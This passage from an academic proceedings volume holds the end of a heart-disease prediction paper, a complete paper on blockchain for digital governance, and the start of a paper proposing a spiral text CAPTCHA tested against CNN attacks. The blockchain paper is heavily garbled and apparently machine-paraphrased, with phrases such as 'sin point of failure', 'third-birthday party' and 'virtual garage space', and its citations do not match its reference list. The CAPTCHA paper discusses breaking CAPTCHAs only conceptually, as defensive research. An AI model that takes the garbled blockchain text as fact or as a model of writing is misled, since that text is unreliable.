MSE 1.21
RMSE 1.1

Table 2 Values of MAE,


Error_type Value for male with Value for female with
SSE, and MSE for overall
c_sex = 1 c_sex = 0
data set for male and female
categories using attribute MAE 0.81 0.44
c_sex MSE 1.59 1.13
RMSE 1.26 1.06

Table 3 Values of MAE, SSE, and MSE for male and female categories for attribute c_cp
Type_o f_error Value_of c_cp = Value_of c_cp = Value_of c_cp = Value_of c_cp =
1 2 3 4
MAE 0.29 0.33 0.36 0.95
MSE 0.29 0.73 0.92 2
RMSE 0.53 0.86 0.96 1.41

Table 4 Values of MAE,


Type of error c_slope = 1 c_slope = 2 c_slop e = 3
SSE, and MSE for male and
female categories for attribute MAE 0.55 0.76 0.50
c_slope MSE 1 1.71 0.50
RMSE 1 1.31 0.71
Prediction of Heart Disease Using Genetic Algorithm 57

have minimum values of 0.50 and 0.50, respectively, when c_slope attribute is 3. In
this case, the prediction model provides better accuracy. When c_slope has a value
of 2, MAE and MSE have highest value of 0.76 1.71, respectively, as shown in Table
4. This makes the prediction model to deviate from the actual values. MAE has a
low value of 0.29 under the consideration of the attributes c_sex, c_cp and c_slope.
This occurs when c_cp has a value of 1. Thus, the attribute c_cp provides better
prediction. We also obtain a minimum value for RMSE of 0.53 when the attribute
c_cp has a value of 1.

7 Conclusion

In this paper, genetic algorithm is utilized in predicting heart disease among patients.
We have used the data set on heart disease available at the UCI machine learning
repository. Performance measures namely MSE and RMSE are calculated using
feature engineering technique on the attributes of the heart disease data set. The male
and female attribute in the data set is also analyzed. RMSE consistency measures indi-
cate that females are succumbed than males by the heart disease. In future, the accu-
racy of the prediction can be improved by utilizing other machine learning methods
such as deep neural networks and association rule mining with other performance
measures.

References

1. Yekkala, I., & Dixit, S. (2018). Prediction of heart disease using random forest and rough set
based feature selection. International Journal of Big Data and Analytics in Healthcare, 3(1),
1–12.
2. Bhuvaneswari Amma, N. G. (2012). Cardiovascular disease prediction system using genetic
algorithm and neural network. In International Conference on Computing, Communication
and Applications, Dindigul, Tamilnadu, India (pp. 1–5). IEEE.
3. Gupta, A., et al. (2020). A machine intelligence framework for heart disease diagnosis. IEEE
Access, 8, 14659–14674.
4. Purushottam, K. S., & Sharma, R. (2016). Efficient heart disease prediction system. Procedia
Computer Science, 85, 962–969.
5. Arabasadi, Z., Alizadehsani, R., Roshanzamir, M., Moosaei, H., & Yarifard, A. A. (2017).
Computer aided decision making for heart disease detection using hybrid neural network-
Genetic algorithm. International Journal of Computer Methods and Programs in Biomedicine,
141, 19–26.
6. Acharyaa, U. R., Sudarshana, V. K., Koha, J. E. W., Martis, R. J., Tana, J. H., Oha, S. L.,
Muhammada, A., Hagiwaraa, Y., Mookiaha, M. R. K., Chuaa, K. P., Chuaa, C. K., & Tane,
R. S. (2017). Application of higher-order spectra for the characterization of Coronary artery
disease using electrocardiogram signals. Biomedical Signal Processing and Control, 31, 31–43.
7. Ali, S. A., Raza, B., Kamran, A., Malik, Shahid, A. R., Faheem, M., Alquhayz, H., & Kumar, Y.
J. (2020). An optimally configured and improved deep belief network (OCI-DBN) approach for
heart disease prediction based on Ruzzo–Tompa and stacked genetic algorithm. IEEE Access,
8, 65947–65958.
58 N. M. Lutimath et al.

8. Yekkala, I., & Dixit, S. (2020). A novel approach for heart disease prediction using genetic
algorithm and ensemble classification. In Proceedings of SAI Intelligent Systems Conference,
Intelligent Systems and Applications (pp. 468–489). Springer.
9. Amin, M. S., Chiam, Y. K., & Varathan, K. D. (2019). Identification of significant features and
data mining techniques in predicting heart disease. Telematics and Informatics, 36, 82–93.
10. Wiharto, H. K., & Herianto, H. (2017). Hybrid system of tiered multivariate analysis and arti-
ficial neural network for coronary heart disease diagnosis. International Journal of Electrical
and Computer Engineering (IJECE), 7(2), 1023–1031. ISSN 2088-8708. https://doi.org/10.
11591/ijece.v7i2.pp1023-1031.
11. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-020-04761-6.
12. Alzubi, O. (2020). Deep learning-based intrusion detection model for industrial wireless sensor
networks. Journal of Intelligent & Fuzzy Systems, In press.
13. Gupta, D.,Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-018-3688-6.
Secured Information Infrastructure
for Exchanging Information for Digital
Governance

Mohd Shukri Alias and S. B. Goyal

Abstract The information infrastructure should be secure to trade in the design of


visual management. A secure blockchain management device can protect integrated
statistics, simpler methods and save you from fraud, garbage, and harassment to
improve compliance and accountability for real exchanges. Individuals, groups, and
governments are collaborating on the distribution of digital-enabled virtual reality
using cryptography on a government-based blockchain that removes the sin point of
failure and apparently protects the realities of the citizen concerned and the authori-
ties. Desire to reduce calls needs to be eliminated by making available adoptions to
control gadget use of the public blockchain to facilitate cross-border or record sharing
and reduce environmental waste by eliminating virtual garage space demand with
virtual management and protecting a different visibility and number system. The
keys to the measurable areas considered in this consideration are considered real
and reliable in the control of facts. Seeking different facts through people to study
development into automated security solutions to transform digital governance data
into a wide range of financial areas includes system performance, content testing and
Internet of Thing (IoT), and online-based ownership. As a result, blockchain tech-
nology can improve the credibility of public institutions that use fraudulent systems
to store information. The blockchain technology allows for the exclusion of social
and fashion contexts of dialogue, as it can create realistic balance in the ecosystem
of corporations and actors across borders.

Keywords Information infrastructure · Digital governance · Blockchain


technology

M. S. Alias (B) · S. B. Goyal


City University, Petaling Jaya, Selangor, Malaysia

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 59
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_5
60 M. S. Alias and S. B. Goyal

1 Introduction

1.1 Definition of Blockchain

Blockchains, which had been proposed in 2008 by using Satoshi Nakamoto for the
monetary sector [1], are considered to be one of the extensive, disruptive fourth indus-
trial revolution technologies [2]. Blockchain is described as a report of transactions
for cryptography that is related in a peer-to-peer community across several computers.
Blockchain uses an unsymmetrical cryptography mechanism to confirm the substan-
tiations of transactions [3]. In general, blockchain authorizes to replace transactions
effectively between two or more parties in a virtual decentralized ledger without the
want for intermediaries [4]. A blockchain is an allotted ledger that accomplishes the
subsequent:
i. Records any transaction or records steadily, completely, and unmodified.
ii. Makes use of one-manner hash cryptography this is computationally imprac-
tical to break.
iii. Able to be seen to all customers with permission.
iv. Makes use of peer-to-peer transmission with each node forwarding new
transactional facts to all others.
v. Can trigger transactions routinely, primarily based on commercial enterprise
common sense and custom algorithms
vi. Verifies transactions via node consensus and not using a reliance on third-
birthday party intermediaries.

1.2 Blockchain Technology

Blockchain production is considered to be the most advanced technology, which


pulls out many industries and services. Blockchain time is an intermediate and peer-
to-peer announcement that should be made public including the visible ledger. It
can be used for database or transactions in a dependent environment without the
involvement of third party. First, blockchain is a well-known and widely used gener-
ation of blockchain. Blockchain is an organization of ledgers in which transactions
made with a certain amount (within cryptocurrencies, tokens, or facts) are arranged
in sequence in blocks. Each block contains a signature that focuses on a specific
form, including a series of facts for that block. The consecutive block contains this
signature attached to all previous blocks with each other until the first block. Blocks
are built and registered throughout the peer-to-peer network, the use of cryptographic
beliefs, and authentication methods for the age-old gadget.
Blockchain generation allows machine operators (known as nodes) to run on
a peer-to-peer network (p2p) and then compiles the transaction in a way that is
distributed across the community [5] It includes owners of goods that are likely to
be manufactured and the transaction itself. Transactions have been certified by the
Secured Information Infrastructure for Exchanging Information … 61

public as a “compromise method,” which allows p2p network clients to verify trans-
actions and renew subscriptions across networks [6]. The consensus machine is used
to set the trust within the precision of facts on a device that is historically installed
by the average person or administrator on the medium. A consensus approach is a
process in which nodes in a shared community agree on proposed activities. This
implementation comes with a way of keeping records within a ledger in a way that
ensures complete price records and consistency. Permit methods are still distributed
through network governance regulations and agreements that allow for documenta-
tion, finalization, and execution of transactions subject to certain conditions. There-
fore, a pretransaction can be agreed upon creating a chain of transactions similar to
a ledger. In blockchains, most transactions are integrated into a matte-matured block
in the previous block. Within the context of bitcoin, after a difficult and fast time, a
new block was created and researcher came up with a blockchain transaction and it
was tested throughout the community. These documents are a series of blocks also
known as blockchain.

1.3 Smart Contract

Another key factor supported by using more than one blockchains is smart contracts.
Intelligent contracts are parts of software that perform different functions depending
on the state of the machine or what is happening. Glossary agreement is a laptop appli-
cation or protocol that assists, validates, or implements the terms of the agreement
[7]. Smart contracts apply to used ledger. They do not choose human intervention and
do so. With built-in assumptions, smart contracts typically produce financial games
and repeat good events and cryptocurrency intervenes financial transactions without
unintentional and unintentional errors [8]. Smart contracts can be seen as non-public
regulatory bodies that refer to a set of rules that govern transactions between inter-
ested parties. Once set, smart contracts do not change and are binding, causing, but
not resolved, the problem of dealing with damage caused by malfunction or code
errors. The smart contract is in official objective sentences. In an integrated system,
the right motive can be judged through a mediator in the event of a dispute. However,
in an invalid blockchain gadget, there is no separate arbitrator, and personal purpose
cannot be detected by entering computer codes. While it may not completely solve
the problem of seeking a superior arbitrator, the personal blockchain gadget can grant
rights to test programs and will no doubt be accurate or refuse certain transactions.

1.4 Distributed Ledger Technology

Distributed ledger technology (DLT) is a generation that accelerates a growing, timely


list of privately signed, unaltered transaction data distributed in the form of all public
donors. Agreements are made with support infrastructure that allows computers in
62 M. S. Alias and S. B. Goyal

various locations to enhance and validate transactions and capture data in a consistent
manner across the community. Any player with the right to access the rights may
receive any real time, at any time in its history, from any actor in the community with
season plans to transact in a simple-key way of codes. Currency exchange arrange-
ments are quickly developed between related peers and consistently demonstrate the
use of algorithms over the community.

1.5 Types of Blockchain

Blockchains are called a groundbreaking machine that contains a variety of characters


that act according to their motivations and in fact they find this [9]. Each of these
blockchain networks works for its own purpose and solves certain problems, and
every blockchain has its own features and advantages over each other. Depending on
the use and requirements, blockchains are divided into three types which can be:
i. Public blockchain: Contains ledgers that are visible to individuals online and
everyone can verify and upload blockchain transactions.
ii. Non-public blockchains: Only allow people targeted within the employer to
verify and add transactions but everyone on the net is allowed to view.
iii. Consortium: A set of highly efficient organization (and banks) can name and
upload activities but the ledger can open or restrict selection or performance.

2 Literature Survey

2.1 Digital Governance (E-governance)

The era of visible governance, formerly known as e-governance, refers to the use
of ICT to sell modern, green, and powerful governance and to facilitate access to
governance statistics and offerings. It contains the implementation of ICT in the
management of the public sector which may lead to the implementation of public
services and methods. E-governance is a broad term that encompasses the preparation
of national institutions, electoral strategies, and the relationship between governance
and the general public. Digital management has organizational, administrative, and
technical aspects in eight broad categories that may be:
i. Governance-to-citizen: Provides well-known online social services, espe-
cially electronic network transmissions related to change and word exchange.
ii. Citizen-to-governance: Offers general public online donations, especially
electronic delivery of providers in exchange for other transactions and
communications.
iii. Governance-to-business: Helps to drive e-transaction projects, such as e-
purchases.
Secured Information Infrastructure for Exchanging Information … 63

iv. Business-to-governance: Assists in the implementation of e-transaction


projects, including e-procurement.
v. Governance-to-worker: Introduces projects to make e-profession programs
and paperwork processes free in e-office.
vi. Governance-to-governance: Allows management departments or companies
to collaborate and interact online with a large database of the presidency.
vii. Governance-to-non-income: The exchange of facts and communication
between governance, the legislature, unpaid businesses, political parties, and
civil society organizations.
viii. Non-earnings-to-governance: Governance of facts and communication
between governance, the legislature, non-profit organizations, political
parties, and civil society organizations.

2.2 Benefits of Applying Blockchain Technology


in Governance

Digital management is a paradigm at the level of technology of public administration.


In the past, to a lesser extent, the concept of e-rule has used the function of digitaliza-
tion as an enter or modern envelopment of public administration. Digital management
takes action ahead of time and focuses on the provision of user-friendly, fast-paced,
and modern social services. Those providers and models of transport providers must
use digital governance technology and citizen realities. Blockchain is actually one
of the most advanced digital technologies that should be considered under the new
governance policy of governance and transport. The benefits of the system of using
blockchain technology in management are aimed at:
i. Reduced economic costs, time, and complex approaches to financial manage-
ment and other private realities that enhance the governance aspect of
government.
ii. Reduced paperwork, consensus, and corruption resulting from the use of leased
labels and smart contracts that can be planned.
iii. Repeated automation, guaranteed transparency, and accountability of informa-
tion in the registry for the benefit of citizens.
iv. Growth agreed upon by citizens and organizations on governance and record
keeping practices was carried out in the form of algorithms that were not limited
to the sole administrator.

3 Problem Statement

This paper aims to clarify how blockchain production research is done in digital
control according to Okoli and Schabram’s manual [10] by conducting systematic
64 M. S. Alias and S. B. Goyal

tests. The manual contains specific activities, as well as the development of an evalu-
ation protocol, which explains subject selection, data extraction, and reporting results
as a guide to answering the following research questions below:
i. How has blockchain generation been researched in the context of virtual
governance?
ii. What are the possibilities, challenges, and consequences diagnosed in the
studies on blockchain technology for virtual governance?
iii. How ought to blockchain generation gain public management inside the context
of reform frameworks?
iv. What are the current public administration reform frameworks?
v. How does blockchain fits well into the narrative of the contemporary public
administration reform framework?
vi. What are the ability use cases of blockchain within the context of public
management?

4 Hypothesis

These security requirements are changing rapidly in the gadget distributed to special-
ized companies, as each organization desires a better way to manage their right to
self-regulatory access [6]. Organizations often retain and take away their right to
enter data management on central servers when using encrypted structures. Gadget
integration controls customer permissions to intervene in internal authentication [5].
The conceptualization studies for this paper are illustrated in terms of research that
can be:
i. The latest blockchain adoption of state-of-the-art technology systems signifi-
cantly improves the efficiency and security of record infrastructure in digital
management.
ii. The blockchain era has a positive impact between the power-enabled access
control machine and the e-governance system.
iii. The duration of smart contracts has a practical effect between the low access
control gadget and the benefits of public administration.
iv. The released ledger time has a positive effect between the intensified entry to
manage the gadget infrastructure and the virtual control device data.
v. Blockchain generation is reorganizing the record regulation officially in
governance frameworks.

5 Methodology

Allocating the power of administrator contributions through certified blockchains


is effective and attractive because it can greatly improve the performance of social
Secured Information Infrastructure for Exchanging Information … 65

media in terms of policies. As mentioned earlier, blockchain time is built on four


main concepts. These are:
i. The platform itself is still widely distributed, so that the statistics contained
within the logger are widely available, which has led to errors and intensified
errors.
ii. The lever document can be simple text, fully encrypted, or split into smaller
value elements. Each encrypted with a different key to allow the bendy model
to clarify facts.
iii. The individual facts in this log do not change; as long as the file has been created,
any trade in that record can also interfere with the integrated laptop hash code
that connects all the blocks with the previous block, breaks the “series,” and
reveals inconsistencies.
iv. The method used to record the record involves some form of consensus, and in
a sense, it can be considered “democratic” within the sense that the majority of
people are in control of determining which transactions are true and correct.
Typically, in any power use case, a blockchain may be appropriate when the three
or four methods described above are important aspects of the use case. If it is better
or more desirable, then the blockchain may go away, but there are other simple and
inexpensive ways to get rid of this problem. If only compelling evidence is required
or open simplest selections, or only drawings are required, then the standard data
management structure may also meet the need. Direct blockchain provision allows
for the completion of a high level of transaction with seamless environment. The
measurable regional buttons considered in this study are:
i. Validity of data: An organization has control of the quantity and to the impact,
as it should be sourced facts that holds actual while shared with the consumer.
ii. Governance of statistics: An agency has described fair commercial enterprise
guidelines to manage statistics and to align with enterprise techniques.
iii. Reliability of facts: A company acts always and proactively, in a timely, idea-
driven way.

6 Expected Impact

Blockchain technology is a growing area of study that offers a variety of research


opportunities especially within the industrial cost of blockchains in virtual gover-
nance. Blockchains create real and unchanging realities in a single context in the
realm of material governance (health care, commerce, alternatively, stock markets,
insurance, advanced training, supply chains, asset management, and banking). Those
double-ties can prove that they are written for non-public businesses. The blockchain
era should be tracked with the help of developing countries to reduce the digital gap
and trade management. Additional challenges and uncertainties provided by using
blockchain technology and technical aspects include security, stability, flexibility,
usability, interoperability, computer performance, garage size, and pricing efficiency.
66 M. S. Alias and S. B. Goyal

7 Conclusion

Programs designed for blockchain will be able to reduce the cost of connecting
devices and convert unstructured communities from a single feature bottle without
the centralized authority to change data involving domains. By using a smart envi-
ronment, devices seem to make themselves and therefore less intelligent. As a rule,
general work can be automated, reduce operating costs, and allow you to manage
service delivery efficiently through a real-world blockchain. Blockchain will dissemi-
nate data so that negative hacking effects can be minimized. Besides, every movement
in the blockchain is recorded and visible to every user. Under such mass surveillance,
misbehavior is not always available.

References

1. Gartner. (2018). Preparing for smart contract adoption. Retrieved February 7, 2019 from
https://www.gartner.com/doc/3894102/preparing-smart-contractadoption
2. Okoli, C., & Schabram, K. (2011). A guide to conducting a systematic literature review of
information systems research. In Working Papers on Information Systems: Sprouts. ISSN 1535-
6078
3. Aitzhan, N. Z., & Svetinovic, D. (2018). Security and privacy in decentralized energy trading
through multi-signatures, blockchain and anonymous messaging streams. IEEE Transactions
on Dependable and Secure Computing, 15(5), 840–852.
4. Wright, A., & De Filippi, P. (2015). Decentralized blockchain technology and the rise of lex
cryptographia. SSRN.
5. Back, S. A., Corallo, M., Dashjr, L., Friedenbach, M., Maxwell, G., Miller, A., & Timón, J.,
(2014). Enabling blockchain innovations with pegged. Open Science Review.
6. Ao, X., & Minsky, N. H. (2003). Flexible regulation of distributed coalitions. Lecture Notes
Computer Science, 2808, 39–60.
7. Swan, M. (2015). Blockchain: Blueprint for a new economy (1st edn). Safari Tech Books
Online. Beijing: O’Reilly.
8. Antonopoulos, A. M., & Wood, G. (2018). Mastering ethereum: Building smart contracts and
DApps (1st edn). Sebastopol: O’Reilly Media.
9. Hu, V. C., Ferraiolo, D. F. & Kuhn, D. R. (2006). Assessment of access control systems.
Interagency Report 7316, NIST.
10. Warburg, B. (2016). How the blockchain will radically transform the economy [TED talk].
Retrieved from https://www.youtube.com/watch?v=RplnSVTzvnU
Spiral CAPTCHA with Adversarial
Perturbation and Its Security Analysis
with Convolutional Neural Network

Shivani and C. Rama Krishna

Abstract Human or bot? The first question comes in mind before deploying web
services. A Completely Automated Public Turing test to tell Computer and Human
Apart (CAPTCHA) is a tool which generally used to boost the security of web
services by conducting a challenge-response test. This test helps to determine whether
incoming requests from legitimate user or intelligent bots. A bot finds it difficult to
predict distorted words which human can easily recognize. There are two major
aspects of a CAPTCHA: easily identified CAPTCHAs by humans and the ability to
prevent bot attacks. This paper presents a new text-based CAPTCHA design called
Spiral CAPTCHA with an immutable adversarial noise (IAN) and validate it using
convolutional neural network (CNN) attacks. A new text-based CAPTCHA “Spiral
CAPTCHA” is designed using PHP. A dataset of 16,384 images has been created.
The proposed CAPTCHA has also been tested for its security against convolutional
neural network “Alexnet.” For evaluation purposes, the CNN model designed with a
dataset containing 8,027 images and validated using 3441 images. Testing of model
performed by randomly choosing bunches of 64, 128, 256, and 512 images from
testing a dataset of 4916 images. For robustness checking against recognition, we
initially tested CAPTCHA without any noise and later checked with noise. Finally,
proposed CAPTCHA is evaluated using recognition rate, recognition speed, attack
speed, and success rate. We achieved a maximum recognition rate for CAPTCHA
without perturbation is 38.48% and with perturbation is 13.50%. However, success
rate is very low (almost 0%) for both cases, which confirms that the proposed
CAPTCHA is robust against recognition attacks.

Keywords CAPTCHA · CNN · Alexnet · Adversarial · IAN · Spiral

Shivani (B) · C. R. Krishna


Department of Computer Science Engineering, National Institute of Technical Teachers Training
and Research, Chandigarh, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 67
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_6
68 Shivani and C. R. Krishna

1 Introduction

Von Ahn et al. were the first in the world, who brought the concept of CAPTCHA.
A challenge—response human intelligence test which is considered to be passed
by humans easily as compared to intelligent machines. It acts as a hurdle for bots
or automatic programs that halts them from exploiting essential web services [1].
Humans can solve CAPTCHA with 90% accuracy, whereas bots can solve them up
to a 1% success rate only, which makes them a good security measure to protect from
malicious programs [2].
Major web services secured by CAPTCHA are: online registration forms,
comments given on various blogs and websites, online polls, and email accounts.
A machine is incapable of identifying human or bot. A typical CAPTCHA process
involves a session in which automated questions are generated by the system and
presented in front of a user. The original identities of responders (humans/bots) are
hidden from system. It recognizes user by analyzing the responses. Another way
by providing a question set in such a way that it can easily solve by humans but
challenging job for bots. Major question categories involve: object identification
in a picture, labeling an image, recognize words in a speech, puzzle-solving, eye
CAPTCHA, pedometric CAPTCHA, and text recognition. Among various types of
CATCHAs, text-based CAPTCHA is the most commonly used one. It requires low
cost for generation of as many numbers as possible without exhausting. Text-based
CAPTCHAs do not require any storage because they use a simple combination of
alphanumeric symbols [3].
To improve the security and reduce the breaking rate, text-based CAPTCHAs
are secured with applying distortions, noise, hollow characters, character isolation,
varied length characters, character overlapping, noise arcs, complicated background,
two-layer structure etc. [4]. However, after the deployment of deep learning models
like convolutional neural network (CNN), it can be broken easily. Further K-nearest
neighbors (KNN) and support vector machine (SVM) models can identify the compli-
cated texts effectively [5–7]. Deep learning (DL) has reduced the identification gap
between human and bot by traditional problem solving. Due to advancements in
artificial intelligence (AI), several researchers claim that DL would lead CAPTCHA
to an “end” [8]. Text-based CAPTCHAs use a simple writing mechanism from left
to right. It enables DL networks to recognize the starting point easily. Therefore,
pre-processing attacks and segmentation can be done easily.
Deep learning brilliantly performs speech processing and image recognition with
human competency. However, it still lags with important deficiency like adversarial
attacks as compared with human capability. Adversarial examples are misclassified
by machine learning (ML) and DL models [9]. This can be taken as an advantage to
enhance CAPTCHAs security, which may leads to misclassification of CAPTCHA
[10].
Based on the above-mentioned issues, researchers developed a two-layer
CAPTCHA, crowding characters together, hollow schemes, etc., to overcome the
security issues [7, 11]. To present a secured CAPTCHA, it should provide robustness
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 69

over ML and DL tools. It should be effective against pre-processing attacks which


try to comprise the perturbations [12]. For this reason, CAPTCHAs evolved from
text-based to image-based scenarios. The ultimate capabilities of the human visual
system are utilized while designing a CAPTCHA to provide coherence in images.
With the applicability of DL over image processing, the security becomes a major
challenge [13]. DL techniques apply a pre-processing to transform color images
into grayscale images and eliminates noise from the background. Finally, segments
the character and computes the results [14]. Therefore, researchers concentrate on
the limitations of text-based CAPTCHAs which are needed to be overcome with
effective and intellectual design and deployments.

1.1 Contribution of this paper is listed as follows

This paper presents a text-based CAPTCHA scheme named “Spiral CAPTCHA,”


which uses an innovative writing mechanism and an intelligent perturbation
“Immutable Adversarial Noise.” It provides security against DL attacks in two ways:
(i) By eliminating traditional writing mechanisms to avoid segmentation attacks and
(ii) By intelligent perturbation which is robust against filtering attacks.
It is shown that the proposed CAPTCHA is secured from DL attack by performing
CNN-based attack. It has been shown that the proposed CAPTCHA can deceive CNN
from recognition. Remaining part of this paper is organized as: Sect. 2 describes about
related work. Section 3 presents the proposed work, methodology, and implemen-
tation details. Section 4 presents the performance parameters over which proposed
CAPTCHA is evaluated. Section 5 shows the results obtained after implementation.
Section 6 presents the usability and security of proposed CAPTCHA and comparison
with existing work. Section 7 provides the concluding remarks.

2 Related Work

Lee et al., [15] proposed an attack resistance model to ensure the user-participation
using visual secret sharing for secured human interaction. Besides user fails to prove
themselves as humans, the system aborts the process to provide security with the help
of CAPTCHA. The simulation outcomes validate the performance of authentication
accuracy among users in terms of practicability.
Castro et al., [16] have presented a human interactive proof (HIP) using puzzle
completion model via the Capy CAPTCHA strategy to enhance the usability and
stability using JPEG compression model. In order to overcome the shortages in
conventional CAPTCHAs, a reduced-cost joint photographic experts group (JPEG)
was utilized to evaluate the images continuity. The investigational work attains a
65% success rate and 20% breaking rate.
70 Shivani and C. R. Krishna

Gao et al., [17] have proposed an attack to validate the security of the two-
layer CAPTCHAs developed by Microsoft. The empirical studies represent the effi-
ciency of the proposed attack using CNN and KNN model with 44.6% success rate.
Furthermore, it provided suggestions to develop improved CAPTCHAs with better
security.
Zhu et al., [18] have introduced a security model named CAPTCHA as graphical
passwords using hard AI techniques to enhance online security. Typically, it was a
combination of CAPTCHA as well as graphical password model which also considers
several security attacks and image hotspot issues. From the simulation analysis, it
proved the usability as well as security.
Beheshti et al., [19] have developed a Visual Integration CAPTCHA (VICAP)
model with supreme capabilities of the Human Visual System (HVS) to combine
the complicated data available in single frames through trans-saccadic memory tech-
nique. Moreover, it combined visual resolution to provide image continuity. Further,
it guaranteed the usability by tuning the Original-to-Random-Output as 40% and
attains success rate of 99% and breaking rate of 0% in the single-frame environment
and 50% in the multi-frame environment.
Ogiela et al., [20] have presented a visual CAPTCHA producing technique with
various formats of texts integrated in a persistent background. In addition, it assesses
the flaws and strength of the proposed CAPTCHA in order to ensure security
through various image detection methodologies, particularly, pattern recognition
models. These CAPTCHA models were applicable specifically for Cloud of Things
applications. Furthermore, cognitive CAPTCHAs were also introduced to enhance
security.
Khattar et al. [21] proposed a plug-n-play adversarial attack (PPAA) in which
perturbation was generated by using constrained uniform random noises. They tested
their approach on Microsoft Common Objects in context dataset and used RetinaNet
object detection algorithm. Authors achieved 96.48% success rate.
Ping Wang et al. [22] proposed a transfer-learning approach for attacking
CAPTCHA. This schemes reduces the attacking complexity and samples labeling
cost. Authors attacked 25 CAPTCHAs online and attained a success rate from 36.3
to 96.9%.
Philip et al. [23] presented a novel data collection technique by using game like
CAPTCHAs. Collected data is used for fake account use revealing by creating a
behavior biometric. They presented game like CAPTCHA as a solution to generate
biometrics interactive data.
Zahra et al. [24] developed a CNN-based deep CAPTCHA to investigate design
shortcomings of alphanumeric CAPTCHAs. They achieved a network attacking
accuracy rate 98.31% for alphanumerical data and 98.94% for numerical data.
Jafar et al. [25] developed prediction of brain tumor with its location using mathe-
matical analysis and machine learning techniques. Author claimed that this approach
will give good accuracy and results.
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 71

Aditya et al. [26] proposed a technique to recognize sounds using convolutional


neural networks and tensor deep stacking networks (TDSN). They used environ-
mental sound’s spectrogram images for training purpose. Authors achieved a success
rate of 49 and 77% for CNN and 56% for TSDN.
A lot of work has been done to make text-based CAPTCHAs secure. Also several
researches successfully broke different text-based CAPTCHA schemes. It has been
found that machine learning and deep learning models like KNN, CNN are most
efficient in breaking text-based CAPTCHAs. Most of text-based CAPTCHAs follows
traditional writing practices like left to write, lack of intelligent noise, same fronts and
color etc. This makes them easy to recognize. It has also been found that adversarial
perturbation plays a vital role to misclassify an object in image-based CAPTCHA and
has been used to make image-based CAPTCHAs secure from DL attacks. But very
less work has been done to make text-based CAPTCHAs robust against recognition
attacks using adversarial perturbation. This paper presents a novel text-based writing
scheme called “Spiral CAPTCHA” with an adversarial perturbation as an add-on.
The proposed CAPTCHA is robust against deep learning recognition attacks.

3 Proposed Work and Methodology

In this paper, a new technique named as “Spiral CAPTCHA” has been proposed
for writing text-based CAPTCHAs. Spiral CAPTCHA resembles to a spiral shape
which initiates from center and radially grows outwards clockwise or anticlockwise.
Figure 1a shows the spiral shape, Fig. 1 shows proposed Spiral CAPTCHA with arcs
as noise, and Fig. 1c shows its resemblance with spiral shape. It can be seen in below
figure how letters in Spiral CAPTCHA are originating from center like spiral and
moving out radially in clockwise direction.
Spiral CAPTCHA is perturbed with immutable adversarial noise (IAN) [10] and
tested for its security from CNN with and without noise. IAN uses “Fast Gradient
Sign Method” followed by a 5 × 5 Median and applied iteratively on the value of
epsilon (noise factor) until it predicts the wrong target. Fast gradient sign method

(a) Spiral Shape (b) Spiral CAPTCHA (c) Resemblance of Spiral


CAPTCHA with spiral shape

Fig. 1 Spiral shape, CAPTCHA, and their resemblance


72 Shivani and C. R. Krishna

Fig. 2 Microsoft’s two-layer


CAPTCHA

(FGSM) finds the signed gradient of the image from itself which used to induce
perturbation in an input image. The main advantage of this perturbation is a user
does not find much difference between actual and perturbed image.
The noise factor step-wise increased and the whole image passed through median
filter. Resulting image passed to CNN for prediction and the process is repeated
with increased value of epsilon until it gets predicted wrong. It is considered that the
proposed CAPTCHA will provide two way securities, first from segmentation attacks
as it uses an unconventional writing scheme, i.e., spiral instead of left to right, which
enables CNN networks to easily recognize starting point of CAPTCHA. Second the
intelligent perturbation used in the CAPTCHA which enables CNN to misclassify
it.
This research inspired from two sources: first “Microsoft’s two-layer CAPTCHA”
(Fig. 2) [17] where a six-characters text CAPTCHA has been written in two rows,
three letters in first row, and rest three in second row using mix of hollow scheme and
character overlapping and second “Immutable adversarial noise” by Osadchy et al.
[10, 17].
Proposed work has been implemented with the following step-by-step procedure:

3.1 Design of Proposed Spiral CAPTCHA

Spiral CAPTCHA designed in PHP with the combination of randomized fonts,


angles, noise arcs, positions, colored background, alphabets, and numerals as shown
in Fig. 1b.
It is an alphanumeric type of CAPTCHA. Total character-set of 56 characters are
used, 24 character of each capital and small English alphabets, and 8 characters of
digits. Alphabets I, O, i, o and digits 0, 1 are excluded while designing CAPTCHA
because of their homoglyph nature, i.e., similar looking property which may confuse
human user while recognizing characters in CAPTCHA. RGB color format is used for
coloring image with inbuilt functions present in PHP. The size of image is 150 pixels
for width and 120 pixels for height. Only single color is used for writing characters in
Spiral CAPTCHA with Adversarial Perturbation and Its Security … 73

Fig. 3 Web layout of Spiral CAPTCHA

image because image pre-processing converts a colored image into grayscale [4], and
therefore, colors lost its meaning in first step itself of image processing by CNN. A
dummy web page is created using PHP to display captcha image and its use. XAMPP
server is used to host the web page locally. Figure 3 shows the web layout of proposed
CAPTCHA. As shown in figure, users are instructed by writing an instruction below
CAPTCHA image “Enter from center in clockwise direction.” Now here one task
is left on user to find out the center of image, e.g., in above-mentioned web page,
the CAPTCHA image used has text “5VLF8P” if we read from center in clockwise
direction.

3.2 Creation of Dataset

A dataset of 16,384 images in PNG format has been created. Out of which 8027
images were used for training, 3441 for validation and remaining 4916 for testing
purpose. Every image is saved in sorted form with its characters as the label of image
as shown in Fig. 4.

3.3 Designing CNN

Instead of using a pre-trained network, a new CNN Alexnet (Fig. 5) has been taken
with three convolution layers, three max_pool layers and two fully connected layers.
74 Shivani and C. R. Krishna

Fig. 4 Spiral CAPTCHA images as dataset

Fig. 5 Proposed CNN architecture to predict Spiral CAPTCHA


Spiral CAPTCHA with Adversarial Perturbation and Its Security … 75

Fig. 6 Prediction on dataset without perturbation

A single channel input image of size 120 × 150 pixels was passed to network. Model
